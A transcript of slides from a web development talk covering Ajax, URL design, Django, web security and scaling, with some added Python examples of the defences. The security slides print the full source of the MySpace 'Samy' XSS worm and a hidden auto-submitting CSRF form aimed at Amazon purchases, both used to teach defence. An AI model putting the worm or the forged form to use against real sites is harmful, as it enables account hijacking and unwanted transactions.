  • 38. • Ajax is often used to avoid page refreshes • So... • Write an app that uses full page refreshes • Use unobtrusive JS to "hijack" links and form buttons and use Ajax instead • Jeremy Keith coined the term "Hijax" to describe this
  • 39. JavaScript libraries “The bad news: JavaScript is broken. The good news: It can be fixed with more JavaScript!” - Geek folk saying
  • 40. Main contenders • Prototype • The Yahoo! User Interface Library • The Dojo Toolkit • jQuery • It’s worth evaluating these in detail, but if you only have time to learn one...
  • 41. The short answer: use jQuery
  • 42. Client-side performance • Relatively new field, pioneered by the performance team at Yahoo! • A few simple changes can make a huge difference to perceived loading times • Example tip: serve your static files (CSS, images etc) from a separate domain - that way the cookies from your regular domain won’t slow down the requests
  • 45. URL design (Yes, I should probably be calling them URIs)
  • 46. Bad URLs example.com/index.html example.com/article.php?sectionId=2343&contentId=638 example.com/blog/2007/December.aspx www.amazon.com/dp/0596516177? tag=davidflanagancom&camp=14573&creative=327641&linkCode=as1& creativeASIN=0596516177&adid=165MWWERY4H71AJERGNZ& • Unnecessary filenames • Expose implementation details • Overly complex
  • 47. Characteristics of good URLs • “Cool URIs don’t change” • Guessable • Hackable • Readable over the phone • Reflects the hierarchy of the site and its data
  • 48. A good URL • simonwillison.net/2007/Nov/27/thumbnail/ • Short, hackable, no implementation exposed • No matter what you’re building, including the year can be really useful in allowing you to change your opinion on your URLs later on without breaking old links
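One way to see why such a URL counts as "hackable" is that its parts map directly onto data. The sketch below is an illustration only: the pattern, the `parse_entry_url` name and the returned tuple are assumptions, not how simonwillison.net is actually routed.

```python
import re
from datetime import date

# Hypothetical pattern for URLs shaped like /2007/Nov/27/thumbnail/
ENTRY_URL = re.compile(
    r"^/(?P<year>\d{4})/(?P<month>[A-Z][a-z]{2})/(?P<day>\d{1,2})/(?P<slug>[\w-]+)/$"
)

# Three-letter month names mapped to month numbers (Jan -> 1 ... Dec -> 12).
MONTHS = {
    name: number
    for number, name in enumerate(
        ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
         "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"],
        start=1,
    )
}


def parse_entry_url(path):
    """Return (published_date, slug) for an entry URL, or None if it does not match."""
    match = ENTRY_URL.match(path)
    if match is None or match.group("month") not in MONTHS:
        return None
    try:
        published = date(
            int(match.group("year")),
            MONTHS[match.group("month")],
            int(match.group("day")),
        )
    except ValueError:
        # Well-formed URL but an impossible date, such as /2007/Feb/31/x/
        return None
    return published, match.group("slug")
```

Because the year, month and day are separate path segments, the same scheme could also serve listing pages at shorter prefixes such as `/2007/` or `/2007/Nov/`.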
  • 49. The Open Source stack • The only option I would consider • Open source means: • Zero vendor lock-in; many open-source components are interchangeable • Better support (fix it yourself, or pay someone smart to fix it for you) • Fewer bugs and better quality code
  • 50. Dynamic languages http://xkcd.com/303/
  • 51. Dynamic languages • Social applications in particular are almost impossible to get right first time • Development only really starts after you’ve launched something and seen what people use it for • Speed and flexibility of development are critical • Dynamic languages let you get more done with fewer lines of code (which means fewer bugs)
  • 52. LAMP • Linux • Apache • MySQL • PHP/Perl/Python
  • 53. LAMP, evolved • Linux / FreeBSD / Solaris • Apache / Lighttpd / nginx / ... • MySQL / PostgreSQL • PHP/Perl/Python / Ruby
  • 54. Web frameworks • Ruby: Ruby on Rails • Python: Django, Pylons, TurboGears • PHP: Symfony, CakePHP, Zend Framework • Perl: Catalyst, Maypole
  • 59. • Two developers • Two designers • Around a dozen editorial staff
  • 74. How do you build a site like lawrence.com? • Interns - unpaid labour! • A big relational database • Newspaper people are baffled by these... • ... so you need a good interface for it • And as many development shortcuts as possible
  • 75. Characteristics • Clean URLs • Loosely coupled components • Designer-friendly templates • Less code • The “good bits” from PHP
  • 76. The Django stack • HTTP handling • Models (an ORM) • Views • Templates • Extras • Admin, RSS framework, generic views...
  • 77. The Django workflow • Build the models • Instant admin! Content people can start adding data • Writing the views • Throw the templates to the designers
  • 79. Open source Django • Django has been open-source since mid-2005 • The newspaper has been able to hire excellent developers from the community • The newspaper CMS is sold as Ellington; one of the features is that you can hire your own Django developers to modify it • Django has been hugely improved by contributions from outside the newspaper
  • 84. All frameworks provide: • A recommended way of laying out code • Separation of application and presentation logic using a template system • An ORM, to reduce the amount of code needed to talk to a database • Reusable components for common tasks
  • 86. Three key attacks • SQL injection • XSS (cross-site scripting) • CSRF (cross-site request forgery)
  • 88. • SQL injection is inexcusable • If the environment you are using doesn’t protect against this for you (through parameterised queries), use a different tool
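As a minimal sketch of what "parameterised queries" means in practice, the example below uses Python's standard `sqlite3` module. The `users` table, its columns and the `find_user` helper are made up for illustration.

```python
import sqlite3


def find_user(conn, username):
    """Look up a user by name with a parameterised query."""
    # The "?" placeholder keeps the value separate from the SQL text, so
    # quotes in the input cannot change the structure of the statement.
    cursor = conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    )
    return cursor.fetchall()


# Hypothetical in-memory database used only for this illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany(
    "INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)]
)
conn.commit()
```

A classic injection string such as `' OR '1'='1` is treated here as a literal (and non-existent) username rather than as SQL, so `find_user` simply returns no rows.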
  • 89. Cross-site scripting • The most common security hole on the web http://example.com/search?q=<script>alert("hello");</script> You searched for <?php echo $_GET['q']; ?> • Massive security hole!
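The usual fix for the hole shown above is to escape user input before writing it into HTML. A minimal sketch in Python, using the standard library's `html.escape`; the `render_search_heading` function name is an assumption made for this example.

```python
from html import escape


def render_search_heading(query):
    """Build the 'You searched for ...' text with the query safely escaped."""
    # escape() turns <, >, & and quote characters into HTML entities,
    # so the browser displays the input instead of executing it.
    return "You searched for " + escape(query, quote=True)
```

With this in place the `<script>` payload from the slide is rendered as visible text. Escaping like this covers HTML text and attribute values only; input placed inside a script block or a URL would need escaping suited to that context.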
  • 90. XSS attackers can... • Replace your logo with something obscene • Steal your user’s authentication cookies • Re-target login forms to point to a password stealing script • Perform any action that the user is allowed to perform themselves • Create self-propagating worms
  • 91. http://namb.la/popular/ http://namb.la/popular/tech.html samy is my hero
  • 92. <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split ('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if (location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while (Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval ('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB) +BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE) {AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'} var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring (61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel'] ='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return} var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS ['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend (BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if (xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL (AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2) {return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
  • 93. HTML is dangerous • It’s best not to allow untrusted users to submit HTML at all • If you let them submit HTML, you’ll need an industrial-grade HTML parser (which emulates browsers, not just the HTML spec) and a very restrictive whitelist • CSS can include JavaScript, and even regular CSS positioning can be used for phishing
  • 94. CSRF • Much less widely understood than XSS... • ... but almost certainly more common • Cross-site request forgery attacks allow attackers to force your users to take actions on your site that they didn’t mean to take • <img src="http://example.com/admin/delete.php?id=5"> • Not just GET; hidden forms allow POST as well
  • 95. <iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe> <form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden"> <input type="hidden" name="ASIN" value="059600656X" /> <input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" /> </form> <script>document.forms.csrf.submit();</script> http://shiflett.org/blog/2007/mar/my-amazon-anniversary
  • 97. Defence against CSRF • You need to know if the form that is being submitted is one that you served up from your own site (as opposed to an evil form created by an attacker) • Include a hidden form field with a token generated by your site and associated with the logged in user in a non-predictable way
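One possible way to build such a token is to sign the user's session identifier with a secret that only the server knows. This is a sketch under assumptions, not a description of any particular framework: `SECRET_KEY`, `make_csrf_token` and `is_valid_csrf_token` are hypothetical names.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret. A real deployment would load a fixed
# value from configuration so that tokens survive restarts.
SECRET_KEY = secrets.token_bytes(32)


def make_csrf_token(session_id):
    """Derive a token tied to this session that an attacker cannot predict."""
    return hmac.new(
        SECRET_KEY, session_id.encode("utf-8"), hashlib.sha256
    ).hexdigest()


def is_valid_csrf_token(session_id, submitted_token):
    """Check the hidden form field against the token expected for this session."""
    expected = make_csrf_token(session_id)
    # compare_digest avoids leaking information through comparison timing.
    return hmac.compare_digest(
        expected.encode("utf-8"), submitted_token.encode("utf-8")
    )
```

The server would write `make_csrf_token(session_id)` into a hidden field of every form it serves and reject any POST for which `is_valid_csrf_token` returns false. A form hosted on an attacker's site cannot include the right value, because the attacker knows neither the secret nor the victim's session identifier.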
  • 99. Scalability is not performance
  • 100. Scalability is not performance Scalable systems increase their performance as new hardware is added, proportional to the hardware’s capacity
  • 101. Vertical vs. horizontal • Vertical scaling: buy a bigger machine • More RAM • More CPU(s) • “Big iron” costing $100,000+ • Horizontal scaling: buy more machines • Almost always better than vertical scaling • But... software must be designed to scale out
  • 102. “Premature optimisation is the root of all evil” - Tony Hoare and Donald Knuth
  • 104. “Shared nothing” • Rasmus Lerdorf, the creator of PHP, describes this as a key principle of scaling • Application servers (web servers running PHP) have no shared state - everything stateful is pushed out to the database layer • This lets you trivially horizontally scale your application servers behind a load balancer • Now you just have to scale the data layer...
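A toy illustration of the shared-nothing idea follows. The application servers keep no state of their own, so a load balancer can hand any request to any of them. All names are invented for the example, and a plain dictionary stands in for the database layer.

```python
import itertools

# Stand-in for the shared data layer (in practice a database or similar).
SESSION_STORE = {}


class AppServer:
    """An application server that holds no per-user state of its own."""

    def __init__(self, name):
        self.name = name

    def handle(self, session_id):
        # Everything stateful is read from and written to the shared store.
        visits = SESSION_STORE.get(session_id, 0) + 1
        SESSION_STORE[session_id] = visits
        return self.name, visits


# Round-robin load balancing over two interchangeable servers.
_servers = itertools.cycle([AppServer("app1"), AppServer("app2")])


def load_balancer(session_id):
    """Send the request to the next server in rotation."""
    return next(_servers).handle(session_id)
```

Consecutive requests for the same session land on different servers, yet the visit count keeps increasing, because none of it lives on the servers themselves. Adding a third `AppServer` would require no change to the handler code.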
  • 105. Four steps to building a scalable data layer • Add caching • De-normalise where necessary • Add database replication • Add sharding
  • 106. Caching • You could cache to disk or shared memory... • ... but you’re better off using memcached • Distributed key/value in-memory caching system, first developed for LiveJournal • Facebook, YouTube, Wikipedia, Flickr... obj = memcache.get(obj_id) if not obj: obj = construct_obj_from_database(obj_id) memcache.put(obj_id, obj) return obj
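The pseudocode on the caching slide can be expanded into a runnable sketch. To keep it self-contained, a small in-process `FakeCache` class stands in for a real memcached client, and a dictionary stands in for the database. Both are assumptions for illustration, as are the key format and the read log.

```python
class FakeCache:
    """In-process stand-in for a memcached client (illustration only)."""

    def __init__(self):
        self._data = {}

    def get(self, key):
        return self._data.get(key)

    def set(self, key, value):
        self._data[key] = value


# Stand-in for the database, plus a log of how often it is actually read.
DATABASE = {1: {"id": 1, "title": "How to build the Web"}}
db_read_log = []


def construct_obj_from_database(obj_id):
    """Pretend to run an expensive query."""
    db_read_log.append(obj_id)
    return DATABASE.get(obj_id)


def get_obj(cache, obj_id):
    """Return the object from the cache, falling back to the database."""
    key = "obj:%d" % obj_id
    obj = cache.get(key)
    if obj is None:
        obj = construct_obj_from_database(obj_id)
        if obj is not None:
            # Only cache real results, so a miss is retried next time.
            cache.set(key, obj)
    return obj
```

Calling `get_obj` twice for the same id reads the database once; the second call is served from the cache. The sketch leaves out invalidation: when the underlying row changes, the cached copy has to be deleted or overwritten.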
  • 107. “Normalised data is for sissies” Cal Henderson, Flickr • You can get a major speed-up by duplicating some data (e.g. counts) in your database • Your application logic will need to keep everything in sync
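As a sketch of what duplicating a count looks like, the example below stores a `comment_count` column on a hypothetical `photos` table and updates it in the same transaction as each new comment. The schema and function names are invented, with SQLite standing in for the production database.

```python
import sqlite3


def add_comment(conn, photo_id, body):
    """Insert a comment and keep the duplicated counter in sync."""
    with conn:  # both statements commit together or not at all
        conn.execute(
            "INSERT INTO comments (photo_id, body) VALUES (?, ?)",
            (photo_id, body),
        )
        conn.execute(
            "UPDATE photos SET comment_count = comment_count + 1 WHERE id = ?",
            (photo_id,),
        )


def comment_count(conn, photo_id):
    """Read the stored count without scanning the comments table."""
    row = conn.execute(
        "SELECT comment_count FROM photos WHERE id = ?", (photo_id,)
    ).fetchone()
    return row[0]


# Hypothetical schema, created in memory for the illustration.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE photos ("
    "id INTEGER PRIMARY KEY, comment_count INTEGER NOT NULL DEFAULT 0)"
)
conn.execute(
    "CREATE TABLE comments ("
    "id INTEGER PRIMARY KEY, photo_id INTEGER NOT NULL, body TEXT)"
)
conn.execute("INSERT INTO photos (id) VALUES (1)")
conn.commit()
```

Reading the count becomes a single-row lookup instead of a `COUNT(*)` over the comments table. The price is that every code path that adds or removes a comment must also update the counter.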
  • 108. Replication • Master-slave replication lets you set up copies of the database to accelerate reads Writes all go to master Master Slave Slave Slave Reads spread across all slaves
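In application code, the master-slave arrangement usually appears as a small routing layer that sends writes to the master and spreads reads over the slaves. The sketch below assumes a hypothetical `ReplicatedRouter` class, and plain strings stand in for real database connections.

```python
import itertools


class ReplicatedRouter:
    """Choose a connection: writes go to the master, reads rotate over slaves."""

    def __init__(self, master, slaves):
        self.master = master
        self._slaves = itertools.cycle(slaves)

    def connection_for(self, sql):
        words = sql.split()
        verb = words[0].upper() if words else ""
        if verb == "SELECT":
            # Reads are spread across the slaves in round-robin order.
            return next(self._slaves)
        # Anything that might modify data goes to the master.
        return self.master
```

For example, `ReplicatedRouter("master", ["slave1", "slave2"])` returns `"master"` for an `INSERT` and alternates between the two slaves for successive `SELECT` statements.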
  • 109. Replication • Master-master replication provides redundant masters, but doesn’t really improve write performance (both still have to make the same number of writes) Writes all go to masters Master Master Slave Slave Slave Reads spread across all slaves
  • 110. Sharding • Sometimes known as federation • Users 1-1000 are on database A, 1001-2000 are on database B... • Often requires a large scale re-write of the system • Much harder to do in social applications where relationships span multiple databases • WordPress MU is an interesting case-study
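The range-based scheme described on the sharding slide comes down to a lookup from user id to database. A minimal sketch, assuming blocks of 1,000 ids per shard with user 1000 falling on the first database; the shard names and the `shard_for_user` helper are hypothetical.

```python
SHARD_SIZE = 1000  # assumed number of users per database

# Hypothetical shard names: users 1-1000, 1001-2000, 2001-3000.
SHARDS = ["database_a", "database_b", "database_c"]


def shard_for_user(user_id):
    """Return the name of the database that holds this user's data."""
    if user_id < 1:
        raise ValueError("user ids start at 1")
    index = (user_id - 1) // SHARD_SIZE
    if index >= len(SHARDS):
        raise LookupError("no shard configured for user %d" % user_id)
    return SHARDS[index]
```

Every query for a single user's data first calls `shard_for_user` to pick a connection. Queries that span users on different shards, such as a friends list, are the hard part that the slide warns about.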
  • 112. Scalable business models • Scaling gets a lot easier if you build it into your business model • 37signals products (Basecamp, Highrise) shard naturally based on individual customer accounts - and more customers means more money for servers • Second Life shards by land area, and land has to be bought by users - they’re essentially a 3D web hosting company
  • 113. Build it on Amazon • S3 - Simple Storage Service • Cheap, robust key-value storage of both small and large files • EC2 - Elastic Compute Cloud • On-demand instant virtual servers, billed by the hour • SQS - Simple Queue Service